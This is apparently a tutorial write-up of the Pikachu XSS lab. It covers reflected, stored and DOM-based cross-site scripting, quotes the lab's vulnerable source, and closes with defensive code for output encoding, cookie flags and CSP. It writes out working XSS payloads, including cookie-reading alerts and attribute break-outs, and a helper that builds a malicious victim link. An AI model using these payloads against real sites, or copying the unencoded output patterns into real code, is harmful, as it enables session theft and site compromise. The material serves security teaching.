XSS vulnerability learning
2022-07-24 07:31:00 【H3018-R】
Principle
An XSS attack usually exploits a vulnerability left in a web page during development: the attacker injects malicious script into the page through some crafted route, and the victim's browser then loads and executes it as if it were part of the site. The malicious payload is usually JavaScript, but it can also be Java, VBScript, ActiveX, Flash or even plain HTML. After a successful attack the attacker may obtain, among other things, the ability to act with the victim's privileges, private page content, and session and cookie data.
XSS is commonly divided into the following types:
1. Reflected XSS;
2. Stored XSS;
3. DOM-based XSS.
Reflected XSS (non-persistent)
Reflected XSS means the application receives untrusted data in a web request and sends it back to the user in the response without checking whether it contains malicious code. It is usually carried out by crafting a URL: once the victim opens that URL, the malicious parameter it carries is written into the page and parsed and executed by the browser. The attack is non-persistent, because it is only triggered when a user clicks a link that contains the malicious parameter.
Here we use the Pikachu practice range as the example.
GET
Open the web page

First enter kobe to try it.

The message parameter looks like an output point.
View source code
$html='';
if(isset($_GET['submit'])){
    if(empty($_GET['message'])){
        $html.="<p class='notice'>Input 'kobe' and try -_-</p>";
    }else{
        if($_GET['message']=='kobe'){
            $html.="<p class='notice'>May you, like {$_GET['message']}, be forever young and always full of passion!</p><img src='{$PIKA_ROOT_DIR}assets/images/nbaplayer/kobe.png' />";
        }else{
            // $_GET['message'] is written into the HTML as-is: this is the reflection point
            $html.="<p class='notice'>who is {$_GET['message']},i don't care!</p>";
        }
    }
}
The input string is neither filtered nor encoded; whatever is passed in message is concatenated straight into the HTML response.
The payload can be used directly:
<script>alert('H3018')</script>
It cannot be typed into the input box as-is, because the box has a maxlength of 20 characters.

But that limit lives only in the browser, so we can change it ourselves (edit the maxlength attribute in the developer tools, or put the payload straight into the URL).
That's it, the pop-up fires.
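The following is an added example (JavaScript, not code from Pikachu or from this post) that models the reflecting branch of the source above as a pure function and builds the GET request the way Burp or the address bar would, so that the 20-character form limit never applies. The lab host and path in LAB are assumptions.

```javascript
// Added example, not Pikachu code: a string-level model of xss_reflected_get.php,
// used to show why maxlength="20" on the input box is not a security control.
// The host and path below are assumed.

// Mirror of the PHP branch logic: user-controlled `message` is concatenated
// straight into HTML with no encoding. PHP's empty() treats '' and '0' as empty.
function renderNotice(message) {
  if (message === '' || message === '0') {
    return "<p class='notice'>Input 'kobe' and try -_-</p>";
  }
  if (message === 'kobe') {
    return "<p class='notice'>May you, like kobe, be forever young!</p>";
  }
  // The reflecting branch: attacker text lands between two HTML tags.
  return "<p class='notice'>who is " + message + ",i don't care!</p>";
}

// The form stops at 20 characters, but the server only ever sees a query string.
// Build the request directly, as the address bar or Burp would.
function buildAttackUrl(base, payload) {
  const u = new URL(base);                 // assumed lab location
  u.searchParams.set('message', payload);  // URL-encodes <, >, ', (, ) and spaces
  u.searchParams.set('submit', 'submit');  // satisfies isset($_GET['submit'])
  return u.toString();
}

// What the PHP side does with that URL: decode the query, then reflect it.
function serveGet(urlString) {
  const params = new URL(urlString).searchParams;
  if (!params.has('submit')) return '';
  return renderNotice(params.get('message') ?? '');
}

// Cheap check on the response: is there an executable <script> element in it?
function containsScript(html) {
  return /<script\b[^>]*>[\s\S]*?<\/script>/i.test(html);
}

const PAYLOAD = "<script>alert('H3018')</script>";                           // 31 chars, longer than maxlength
const LAB = 'http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.php';       // assumed
const url = buildAttackUrl(LAB, PAYLOAD);
console.log(url);              // the link that would be sent to a victim
console.log(serveGet(url));    // the HTML the victim's browser would execute
```

Sending the link is the whole attack: the client-side length check is skipped because the browser never renders the form for that request, and the server reflects the decoded parameter unchanged.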

POST

This is a login page; the account and password are given right on it, so we just log in.

Here the payload can be typed directly into the input box,
or the POST data can be modified in Burp Suite (bp).


<script>alert('H3018')</script>
To read the cookie:
<script>alert(document.cookie)</script>
View source code
$html='';
if(isset($_POST['submit'])){
    if(empty($_POST['message'])){
        $html.="<p class='notice'>Input 'kobe' and try -_-</p>";
    }else{
        // the parameter from the front end is output as-is, which produces the XSS
        if($_POST['message']=='kobe'){
            $html.="<p class='notice'>May you, like {$_POST['message']}, be forever young and always full of passion!</p><img src='{$PIKA_ROOT_DIR}assets/images/nbaplayer/kobe.png' />";
        }else{
            $html.="<p class='notice'>who is {$_POST['message']},i don't care!</p>";
        }
    }
}
Again there is no filtering or encoding of the incoming string; the only difference from the GET case is that the parameter arrives in the POST body, so the attacker needs a form or script that submits it rather than a plain link.
Stored XSS
Stored XSS is also called persistent XSS: the attack script is saved permanently in the target server's database or files, so it fires for every visitor who loads the page and is far better hidden than a reflected payload.
Again we use the Pikachu range as the example.

A message board.
Enter the payload directly:
<script>alert(document.cookie)</script>
The cookie pops straight away.
When we open this page again it pops again, because the payload is now served from the database.

View source code
$html='';
if(array_key_exists("message",$_POST) && $_POST['message']!=null){
    // escape() only makes the string safe for the SQL statement
    $message=escape($link, $_POST['message']);
    $query="insert into message(content,time) values('$message',now())";
    $result=execute($link, $query);
    if(mysqli_affected_rows($link)!=1){
        $html.="<p>Database error, submission failed!</p>";
    }
}
<?php echo $html;
$query="select * from message";
$result=execute($link, $query);
while($data=mysqli_fetch_assoc($result)){
    // the stored content is echoed into the page with no HTML encoding
    echo "<p class='con'>{$data['content']}</p><a href='xss_stored.php?id={$data['id']}'>Delete</a>";
}
echo $html;
?>
The payload goes into the database essentially untouched: escape() only escapes the characters that would break the SQL string literal, which prevents SQL injection but does nothing for HTML, and nothing encodes the content when it is read back.
Every visit runs the SELECT again and echoes the stored rows, so the pop-up is triggered on every page load.
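To make the escape()-versus-encoding point concrete, here is an added example (JavaScript, not Pikachu code): a string-level model of xss_stored.php with an in-memory stand-in for the message table. escape() is assumed to behave like mysqli_real_escape_string, which is what its use inside the INSERT implies; the tiny SQL-literal parser stands in for MySQL reading the statement back.

```javascript
// Added example, not Pikachu code: shows that SQL escaping round-trips the
// attacker's text unchanged and the render loop emits it raw on every request.

// Stand-in for mysqli_real_escape_string: backslash-escape only the characters
// that could terminate or alter a SQL string literal. <, >, / and = are left
// alone because they mean nothing to the SQL parser.
function sqlEscape(s) {
  return s.replace(/[\0\n\r\\'"\x1a]/g, (c) => {
    switch (c) {
      case '\0': return '\\0';
      case '\n': return '\\n';
      case '\r': return '\\r';
      case '\x1a': return '\\Z';
      default: return '\\' + c;   // backslash, single quote, double quote
    }
  });
}

// What the database does with the quoted literal in the INSERT: undo the escapes.
// The stored value is therefore byte-for-byte what the attacker typed.
function sqlUnescapeLiteral(lit) {
  return lit.replace(/\\(.)/g, (_, c) => ({ 0: '\0', n: '\n', r: '\r', Z: '\x1a' }[c] ?? c));
}

const messageTable = [];   // constructed stand-in for the `message` table

// Same shape as the post's INSERT; "executing" it means pulling the literal back
// out of the statement text exactly as the DB parser would.
function insertMessage(userMessage) {
  const query = `insert into message(content,time) values('${sqlEscape(userMessage)}',now())`;
  const literal = query.match(/values\('((?:[^'\\]|\\.)*)',now\(\)\)/)[1];
  messageTable.push({ id: messageTable.length + 1, content: sqlUnescapeLiteral(literal) });
  return query;
}

// Mirror of the rendering loop: every GET re-reads the rows and echoes them raw.
function renderMessages() {
  return messageTable
    .map((row) => `<p class='con'>${row.content}</p><a href='xss_stored.php?id=${row.id}'>Delete</a>`)
    .join('');
}

function countScripts(html) {
  return (html.match(/<script\b/gi) || []).length;
}

const PAYLOAD = "<script>alert(document.cookie)</script>";
console.log(insertMessage(PAYLOAD));          // no quotes in it, so escape() changes nothing
console.log(insertMessage("it's 'H3018'"));   // quotes are escaped for SQL, then restored by the DB
console.log(renderMessages());                // the <script> comes back on every render
```

The escaping is doing its job, protecting the INSERT, and still every row is returned to the page as markup; the fix belongs at the output side, not at the query.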

DOM-based XSS
The Document Object Model (DOM) is the W3C-recommended standard programming interface (API) for processing HTML and XML documents. It is platform- and language-independent, and lets programs and scripts dynamically access and update the content, structure and style of a document (the document itself being described by HTML or XML). The document can be processed further and the result written back into the current page. DOM is a tree-based API and requires the whole document to be held in memory; the other common XML API is the event-based SAX, which can handle very large XML files precisely because it does not load them into memory in full.
JavaScript can modify the document object tree and thereby change the elements of the page.
Properties and methods commonly involved in DOM-based XSS, as sources (where attacker-controlled data enters the script) and sinks (where it is written into the page):
document.referrer attribute (source)
window.name attribute (source)
location attribute (source)
innerHTML attribute (sink)
document.write() method (sink)
DOM type XSS

View source code
if(isset($_GET['text'])){
    $haha = "Here is the back-end processing logic";
}
<script>
    function domxss(){
        // source: the value of the text box
        var str = document.getElementById("text").value;
        // sink: spliced into a single-quoted href attribute and assigned to innerHTML
        document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?</a>";
    }
</script>
The input is not filtered, so we just close the single-quoted href attribute (and the tag) and append our own markup.
payload:
'><a href=javascript:alert('H3018') //
' onclick="alert('H3018')"> //
'><img src=x onerror="alert('H3018')"> //
DOM type XSS-X

View source code
if(isset($_GET['text'])){
    $html.= "<a href='#' onclick='domxss()'>Some things you try hard to forget, and then you really do forget</a>";
}
<script>
    function domxss(){
        // source: the query string of the URL
        var str = window.location.search;
        var txss = decodeURIComponent(str.split("text=")[1]);
        var xss = txss.replace(/\+/g,' ');
        // sink: the same href/innerHTML splice as before
        document.getElementById("dom").innerHTML = "<a href='"+xss+"'>Let the past go with the wind</a>";
    }
</script>
Closing the attribute works here too, and the payloads are the same. The only difference is that the source is now window.location.search, so the payload travels in the URL and can be sent to a victim as a link.
'><a href=javascript:alert('H3018') //
' onclick="alert('H3018')"> //
'><img src=x onerror="alert('H3018')"> //
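Both DOM pages above share one source-to-sink flow. The block below is an added example (JavaScript, not Pikachu code) that writes that flow as pure string functions, so the attribute break-out can be inspected without a browser, and then shows a sink that keeps the "link to what the user typed" feature without ever re-parsing the value as HTML. The base URL used by safeAnchor is an assumption.

```javascript
// Added example, not code from Pikachu or from the original post.

// Source handling copied from xss_dom_x.php: everything after the first "text="
// in the query string. It is not a real query parser: "?context=foo&text=bar"
// also matches, because "context" contains "text".
function extractText(search) {
  const raw = search.split('text=')[1];
  if (raw === undefined) return '';
  return decodeURIComponent(raw).replace(/\+/g, ' ');
}

// The same source read with a proper parser.
function extractTextProperly(search) {
  return new URLSearchParams(search).get('text') ?? '';
}

// Sink exactly as on the page: the value is spliced into a single-quoted href and
// the whole string goes to innerHTML, so the browser re-parses it as markup.
function vulnerableAnchorHtml(text) {
  return "<a href='" + text + "'>Let the past go with the wind</a>";
}

// Full vulnerable flow: URL query string in, innerHTML string out.
function vulnerableFlow(search) {
  return vulnerableAnchorHtml(extractText(search));
}

// Two cheap checks on the produced markup: how many elements are there, and
// did any of them gain an event-handler attribute?
function countElements(html) {
  return (html.match(/<[a-z]/gi) || []).length;
}
function hasEventHandler(html) {
  return /\son[a-z]+\s*=/i.test(html);
}

// Hardened sink: treat the value as a URL, never as markup. Only http(s) targets
// (absolute or page-relative) are accepted, which rules out javascript: and data:.
// The caller then does a.setAttribute('href', r.href); a.textContent = r.label;
// so no attacker-controlled string is ever handed to innerHTML.
function safeAnchor(text, baseUrl = 'https://lab.example/') {   // baseUrl assumed
  let parsed;
  try {
    parsed = new URL(text, baseUrl);
  } catch {
    return null;
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return null;
  return { href: parsed.href, label: 'Let the past go with the wind' };
}

// Demo with the page's own payload, URL-encoded as a browser would send it.
const DEMO_SEARCH = '?text=' + encodeURIComponent("'><img src=x onerror=\"alert('H3018')\">");
console.log(vulnerableFlow(DEMO_SEARCH));                    // two elements, one onerror handler
console.log(safeAnchor(extractTextProperly(DEMO_SEARCH)));   // a plain https URL, no markup
```

The hardened version changes what the value is allowed to be (a URL of an acceptable scheme) and how it reaches the DOM (an attribute set through the API), which is the general shape of a DOM XSS fix: pick a sink that does not parse HTML, and validate for the type the sink expects.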
Defence
Filter (validate) input, and encode output for the context it is written into (HTML body, attribute, JavaScript). Set the HttpOnly flag on session cookies so that script cannot read them through document.cookie, and enable web security headers such as Content-Security-Policy.
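The following is an added example (JavaScript, not Pikachu code) that puts the three defences above into runnable form: an HTML encoder equivalent to PHP's htmlspecialchars($s, ENT_QUOTES) applied to the reflecting branch from the first source listing, a check of the attributes on a Set-Cookie header, and a check of whether a Content-Security-Policy still permits inline script. The cookie and header values are constructed samples.

```javascript
// Added example, not Pikachu code: output encoding, cookie flags and CSP.

// 1. Encode output for the HTML body/attribute context (htmlspecialchars ENT_QUOTES).
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
function htmlEncode(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// The reflecting branch of xss_reflected_get.php with the fix applied: the same
// template, but the untrusted value is encoded at the point it enters the HTML.
function renderNoticeSafe(message) {
  return "<p class='notice'>who is " + htmlEncode(message) + ",i don't care!</p>";
}

// 2. Session cookie flags. Parse a Set-Cookie header and report which protective
// attributes are missing. HttpOnly keeps document.cookie (and so the payloads on
// this page) from reading the session id; Secure and SameSite are the usual companions.
function auditSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim());
  const [name] = parts[0].split('=');
  const attrs = new Set(parts.slice(1).map((p) => p.split('=')[0].toLowerCase()));
  const missing = [];
  if (!attrs.has('httponly')) missing.push('HttpOnly');
  if (!attrs.has('secure')) missing.push('Secure');
  if (!attrs.has('samesite')) missing.push('SameSite');
  return { name, missing };
}

// 3. A sample Content-Security-Policy value. Without 'unsafe-inline' in the
// effective script source list, inline <script> and on* handlers do not run,
// which is what every payload on this page relies on.
const CSP_VALUE = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

// Simplified check: does the policy still allow inline script? script-src is
// used if present, otherwise default-src; with neither, scripts are unrestricted.
// (Nonce and hash sources, which change this rule, are out of scope here.)
function cspAllowsInlineScript(headerValue) {
  const directives = headerValue.split(';').map((d) => d.trim()).filter(Boolean);
  const scriptSrc =
    directives.find((d) => /^script-src(\s|$)/.test(d)) ??
    directives.find((d) => /^default-src(\s|$)/.test(d));
  if (scriptSrc === undefined) return true;
  return scriptSrc.includes("'unsafe-inline'");
}

console.log(renderNoticeSafe("<script>alert('H3018')</script>"));    // rendered as text, not executed
console.log(auditSetCookie('PHPSESSID=abc123; Path=/'));              // constructed header, missing all three
console.log('Content-Security-Policy: ' + CSP_VALUE, cspAllowsInlineScript(CSP_VALUE));
```

Output encoding removes the vulnerability; HttpOnly and CSP limit what a payload can do if an encoding is missed somewhere, so they are worth having even on a site that believes it encodes everything.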